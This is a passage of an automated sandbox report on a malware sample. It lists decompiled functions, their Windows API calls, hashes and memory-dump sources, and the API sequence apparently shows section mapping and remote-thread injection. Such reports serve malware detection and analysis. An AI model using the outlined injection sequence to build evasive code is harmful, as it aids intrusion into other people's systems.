Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02CA0A22 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02CA0A4A
Module32First.KERNEL32(00000000,00000224), ref: 02CA0A6A

Memory Dump Source

Source File: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c9d000_FyDBXJE74v.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 4a97a2a2baba50396ccc3009b50f5bfee862a036fec9055f64a5ae3cabcb87ee
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: A5F0F6355407126BD7203BF8A88CBAEB6FCAF882ADF100128E647D10C0DB70ED058B61

Function 02BC003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BC024D

Strings

kernel32.dll, xrefs: 02BC008F, 02BC0095
cess, xrefs: 02BC018D

Memory Dump Source

Source File: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bc0000_FyDBXJE74v.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: a97384a6708762faa592521019cf2917f48b713c582d72c5f24114e11d221d69
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D9526974A01229DFDB64DF58C984BACBBB1BF09304F1484E9E94DAB351DB30AA95CF14

Function 00415BD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B19CE8), ref: 00415CAF
GetProcAddress.KERNEL32(00000000,0041BCD0), ref: 00415CEC
VirtualProtect.KERNELBASE(02B19B2C,02B19CE4,00000040,?), ref: 00415D0B

Strings

, xrefs: 00415C15

Memory Dump Source

Source File: 00000000.00000002.1825971161.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_FyDBXJE74v.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: fce140ef23c65c88e38e2773b9808fd7a4a7f181c7d9ac89fa5d9b1ed533d8e0
Instruction ID: bc4e3c19969ebc9a4e99d85580481d2fdd23850efab95505bf2beb8bb76e5d7b
Opcode Fuzzy Hash: fce140ef23c65c88e38e2773b9808fd7a4a7f181c7d9ac89fa5d9b1ed533d8e0
Instruction Fuzzy Hash: DF3155149487C0CAE301CB78F8547823FA2EB25744F44847CD589873A5EFBA1524D7EE

Function 02BC0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02BC0223,?,?), ref: 02BC0E19
SetErrorMode.KERNELBASE(00000000,?,?,02BC0223,?,?), ref: 02BC0E1E

Memory Dump Source

Source File: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bc0000_FyDBXJE74v.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 77c97d7024dbc5d55cac5be4f831ea749ad4cceaf4e4613560d8921a742c1e29
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 10D01231545129B7D7003A94DC09BCD7B1CDF09B67F108451FB0DD9080C770954046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02CA06E1 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02CA0732

Memory Dump Source

Source File: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c9d000_FyDBXJE74v.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 71fa39d9060702261d6bba4fe7cfb5c2bb62d14aa5838603c04f981b621a25b4
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 82113F79A00208EFDB01DF98C995E9CBBF5AF08350F058094F9489B361D371EA50DF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00415BA0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B19CE4,0041624B), ref: 00415BA8

Memory Dump Source

Source File: 00000000.00000002.1825971161.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_FyDBXJE74v.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: bc268097d7bb7fb4f78415c0ee36feb01ff13b3e1ebb730f1ec7cab6ec31a301
Instruction ID: fe12b94824aaeca9f7b044923cb86b1d99ba87f8ef2d7c3be42197bf5250df23
Opcode Fuzzy Hash: bc268097d7bb7fb4f78415c0ee36feb01ff13b3e1ebb730f1ec7cab6ec31a301
Instruction Fuzzy Hash: D5B092B09846409BD7008BB0A814B513AA4F308742F404461F60982180CA2014208F14

Non-executed Functions

Function 02BC092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 02BC09DC, 02BC09DF, 02BC09E4
., xrefs: 02BC095F
l, xrefs: 02BC0966

Memory Dump Source

Source File: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bc0000_FyDBXJE74v.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: e9c4169f1cdbb9451e493c09451d5fc7c88c54de07c593ae9b5ad607450204a3
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: A3314BB6900609DFDB10DF99C880BADBBF5FF48324F24448AD941A7210D7B1EA45CFA4

Function 02CA02FF Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c9d000_FyDBXJE74v.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 84bebb68fce0bd668db63136b6069288a32a2711d679339cf53624a4cdb1a196
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 71118E72345101AFDB44DF55DC90FA673EAFB882A4B1980A5EE08CB311E675E801CB60

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 02BC0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bc0000_FyDBXJE74v.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 036e032725fc328cbafa9cd25af73b3eb867bb778cbe934c1ad8269db9fb5d96
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 1501A776A10604CFDF21EF24C844BAA33E9EB85215F5548E9D906D7241E774A9418B90

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Function 00415DA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00415DD1
WritePrivateProfileStringA.KERNEL32(00418370,0041834C,00418324,00418314), ref: 00415DF5
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415DFD
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415E3D
GetComputerNameW.KERNEL32(?,?), ref: 00415E51
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415E5F
OpenJobObjectA.KERNEL32(00000000,00000000,00418398), ref: 00415E6E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415E7F

Strings

-, xrefs: 00415E8C

Memory Dump Source

Source File: 00000000.00000002.1825971161.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_FyDBXJE74v.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: 53c3cc1668bbfc59426ceed2c59907604522a8f50e66552bdf02a6620a93bac6
Instruction ID: abc8187be86aaec5557a924f26b2f4a332d91e2d9627e3e72ea80ce62a19c939
Opcode Fuzzy Hash: 53c3cc1668bbfc59426ceed2c59907604522a8f50e66552bdf02a6620a93bac6
Instruction Fuzzy Hash: D721FD31E84344EBD7209FA4DC85BDA7B74EB4CB11F1080AAF64DAA1C0CAB416C48B59

Function 00415EC0 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00415EF4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415F0F
HeapDestroy.KERNEL32(00000000), ref: 00415F2E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415F36

Memory Dump Source

Source File: 00000000.00000002.1825971161.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_FyDBXJE74v.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: 1631845fca2a3b933b01173c481672e708b800b3662ef8171a9e2b6aaa0f14d0
Instruction ID: c20d9250ee03896141b2a136b5260c7d7263afdf9e87988df33f4b26659f440c
Opcode Fuzzy Hash: 1631845fca2a3b933b01173c481672e708b800b3662ef8171a9e2b6aaa0f14d0
Instruction Fuzzy Hash: 7D01F270A84604DBD710EBA4ED49BDA7BB8EB0C706F804077F60A97281DA3419948B5A

Analysis Process: wsbgrghPID: 7956, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	29.4%
Signature Coverage:	0%
Total number of Nodes:	163
Total number of Limit Nodes:	7

Executed Functions

Function 00415F50 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 288
filepipetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00416022
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041603B
FindAtomW.KERNEL32(00000000), ref: 00416042
SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041604A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00416062
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00416089
MoveFileW.KERNEL32(00000000,00000000), ref: 00416091
GetVersionExW.KERNEL32(?), ref: 0041609E
DisconnectNamedPipe.KERNEL32(?), ref: 004160B1
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004160F6
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00416105
LCMapStringA.KERNEL32(00000000,00000000,004183A0,00000000,?,00000000), ref: 0041611B
GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 0041612D
PulseEvent.KERNEL32(00000000), ref: 0041613D
SetCommState.KERNELBASE(00000000,00000000), ref: 00416164
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00416195
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004161A6
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 004161AE
GetTimeFormatW.KERNEL32(00000000,00000000,?,004183D0,?,00000000), ref: 004161EE
GetFileAttributesW.KERNEL32(00000000), ref: 004161F5
GetConsoleAliasExesLengthA.KERNEL32 ref: 004161FB
GetBinaryType.KERNEL32(004183E0,?), ref: 0041620D

Strings

k`, xrefs: 004162C3
}$, xrefs: 004162E7

Memory Dump Source

Source File: 00000005.00000002.2068533700.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wsbgrgh.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBoundsBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedModeModuleMoveNameNamedOutputPathPipePulseRectSearchStateTimeVersion
String ID: k`$}$
API String ID: 4155975733-956986773
Opcode ID: ec1e4d95d6be3dfcdf53541fe43f6e0baff54e05d6a8dcf86ef6a62a0be8a3cf
Instruction ID: eba57e92584bb82605fa89a7ec6af6020b8b03ca4a43cd0270bfcb4f130e7ef6
Opcode Fuzzy Hash: ec1e4d95d6be3dfcdf53541fe43f6e0baff54e05d6a8dcf86ef6a62a0be8a3cf
Instruction Fuzzy Hash: 27A11471841A24EBC720DB65DC58ADF7B78EF89351F4140AAF50AA7150CB384A81CBED

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
